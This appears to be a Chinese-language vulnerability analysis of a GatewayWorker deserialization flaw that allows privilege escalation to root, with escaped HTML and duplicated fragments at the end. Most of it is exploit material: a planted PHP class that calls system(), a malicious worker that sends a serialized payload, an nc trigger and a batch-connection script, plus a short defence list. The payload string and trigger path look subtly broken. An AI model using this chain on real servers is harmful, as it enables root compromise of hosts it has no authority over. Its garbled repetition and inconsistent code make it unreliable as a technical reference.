GatewayWorker反序列化漏洞提权技术分析<\/h1>

漏洞概述<\/h2>
GatewayWorker框架存在反序列化漏洞，攻击者可以利用该漏洞在特定条件下实现权限提升。该漏洞主要存在于GatewayWorker v3.1.0版本中，在v3.1.2版本后由于负载均衡策略变更，利用难度有所增加但仍存在风险。<\/p>

漏洞背景<\/h2>

GatewayWorker是基于Workerman开发的一个项目框架，用于快速开发TCP长连接应用，如即时通讯、推送服务等。它采用经典的Gateway和Worker进程模型：<\/p>

Gateway进程：负责维持客户端连接并转发数据<\/li>

BusinessWorker进程：处理实际业务逻辑（默认调用Events.php）<\/li> <\/ul>

漏洞发现过程<\/h2>

发现目标服务器运行着root权限的PHP进程（GatewayWorker）<\/li>
进程运行的PHP文件具有www用户可修改权限<\/li>

常规提权方法无效后，转向代码审计<\/li> <\/ol>

漏洞原理<\/h2>

GatewayWorker框架中存在不安全的反序列化操作点：<\/p>

vendor\/workerman\/gateway-worker\/src\/Gateway.php<\/code>中的onWorkerMessage<\/code>函数处理worker发往gateway的指令<\/li>
其中"session合并"指令会调用sessionDecode<\/code>函数<\/li>

vendor\/workerman\/gateway-worker\/src\/Lib\/Context.php<\/code>中的sessionDecode<\/code>直接使用unserialize()<\/code>函数<\/li>
<\/ol>
利用条件<\/h2>

能够以低权限用户身份修改vendor目录下的文件<\/li>
GatewayWorker以root权限运行<\/li>
能够注册自定义worker或触发已有worker发送恶意指令<\/li>
<\/ol>
详细利用步骤<\/h2>
1. 环境准备<\/h3>
以root权限运行GatewayWorker demo：<\/p>
php start.php start
<\/span><\/span><\/code><\/pre>2. 准备恶意类文件<\/h3>
创建Foo.php<\/code>并放置在vendor\/workerman\/gateway-worker\/src\/<\/code>目录下：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Foo<\/span> {
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        \/\/ 执行系统命令，例如创建文件
<\/span><\/span><\/span><\/span>        system<\/span>('echo "exploited" > \/tmp\/exploit.txt'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 创建恶意worker (poc.php)<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>require_once<\/span> __DIR__<\/span> .<\/span> '\/vendor\/autoload.php'<\/span>;
<\/span><\/span>
<\/span><\/span>use<\/span> GatewayWorker\BusinessWorker<\/span>;
<\/span><\/span>use<\/span> GatewayWorker\Lib\Gateway<\/span>;
<\/span><\/span>
<\/span><\/span>$worker =<\/span> new<\/span> BusinessWorker<\/span>();
<\/span><\/span>$worker-><\/span>name<\/span> =<\/span> 'ExploitWorker'<\/span>;
<\/span><\/span>$worker-><\/span>count<\/span> =<\/span> 1<\/span>;
<\/span><\/span>
<\/span><\/span>$worker-><\/span>onWorkerStart<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    \/\/ 构造恶意序列化数据
<\/span><\/span><\/span><\/span>    $payload =<\/span> 'O:20:"FooGatewayWorkerFoo":0:{}'<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 发送给gateway触发反序列化
<\/span><\/span><\/span><\/span>    Gateway<\/span>::<\/span>sendToCurrentClient<\/span>($payload);
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>BusinessWorker<\/span>::<\/span>runAll<\/span>();
<\/span><\/span><\/code><\/pre>4. 注册恶意worker<\/h3>
php poc.php start
<\/span><\/span><\/code><\/pre>5. 触发漏洞<\/h3>
根据Gateway协议类型选择触发方式：<\/p>

对于TCP协议：<\/li>
<\/ul>
nc 127.0.0.1 8282<\/span> -v
<\/span><\/span><\/code><\/pre>
对于WebSocket协议：使用WebSocket客户端连接<\/li>
<\/ul>
6. 批量触发（针对v3.1.2+版本）<\/h3>
由于v3.1.2+版本默认使用轮询负载均衡，需要编写批量请求脚本：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>require_once<\/span> __DIR__<\/span> .<\/span> '\/vendor\/autoload.php'<\/span>;
<\/span><\/span>
<\/span><\/span>use<\/span> Workerman\Worker<\/span>;
<\/span><\/span>use<\/span> Workerman\Connection\AsyncTcpConnection<\/span>;
<\/span><\/span>
<\/span><\/span>$worker =<\/span> new<\/span> Worker<\/span>();
<\/span><\/span>$worker-><\/span>count<\/span> =<\/span> 4<\/span>;
<\/span><\/span>
<\/span><\/span>$worker-><\/span>onWorkerStart<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    for<\/span> ($i =<\/span> 0<\/span>; $i <<\/span> 100<\/span>; $i++<\/span>) {
<\/span><\/span>        $conn =<\/span> new<\/span> AsyncTcpConnection<\/span>('tcp:\/\/127.0.0.1:8282'<\/span>);
<\/span><\/span>        $conn-><\/span>connect<\/span>();
<\/span><\/span>    }
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>Worker<\/span>::<\/span>runAll<\/span>();
<\/span><\/span><\/code><\/pre>技术要点<\/h2>

反序列化触发点<\/strong>：通过worker向gateway发送特定指令触发sessionDecode<\/code>中的unserialize()<\/code><\/li>
类自动加载机制<\/strong>：当反序列化遇到未加载的类时，会触发autoload机制<\/li>
文件包含利用<\/strong>：通过控制vendor目录下的类文件实现代码执行<\/li>
权限提升<\/strong>：由于GatewayWorker以root运行，恶意代码也以root权限执行<\/li>
<\/ol>
防御措施<\/h2>

升级到最新版本GatewayWorker<\/li>
限制vendor目录的写入权限<\/li>
实现自定义的session序列化\/反序列化方法<\/li>
使用安全的反序列化函数或添加签名验证<\/li>
对worker注册进行身份验证<\/li>
<\/ol>
总结<\/h2>
该漏洞利用链如下：<\/p>

低权限注册恶意worker<\/li>
客户端请求触发恶意worker<\/li>
恶意worker发送序列化payload<\/li>
Gateway反序列化时触发autoload<\/li>
加载恶意类文件实现代码执行<\/li>
以root权限完成提权<\/li>
<\/ol>
参考链接<\/h2>

GatewayWorker官方文档：https:\/\/www.workerman.net\/doc\/gateway-worker\/<\/li>
<\/ul>

GatewayWorker反序列化漏洞提权技术分析<\/h1>

漏洞概述<\/h2> GatewayWorker框架存在反序列化漏洞，攻击者可以利用该漏洞在特定条件下实现权限提升。该漏洞主要存在于GatewayWorker v3.1.0版本中，在v3.1.2版本后由于负载均衡策略变更，利用难度有所增加但仍存在风险。<\/p>

详细利用步骤<\/h2>

参考链接<\/h2> GatewayWorker官方文档：https:\/\/www.workerman.net\/doc\/gateway-worker\/<\/li> <\/ul>

漏洞概述<\/h2>
GatewayWorker框架存在反序列化漏洞，攻击者可以利用该漏洞在特定条件下实现权限提升。该漏洞主要存在于GatewayWorker v3.1.0版本中，在v3.1.2版本后由于负载均衡策略变更，利用难度有所增加但仍存在风险。<\/p>

参考链接<\/h2>

GatewayWorker官方文档：https:\/\/www.workerman.net\/doc\/gateway-worker\/<\/li> <\/ul>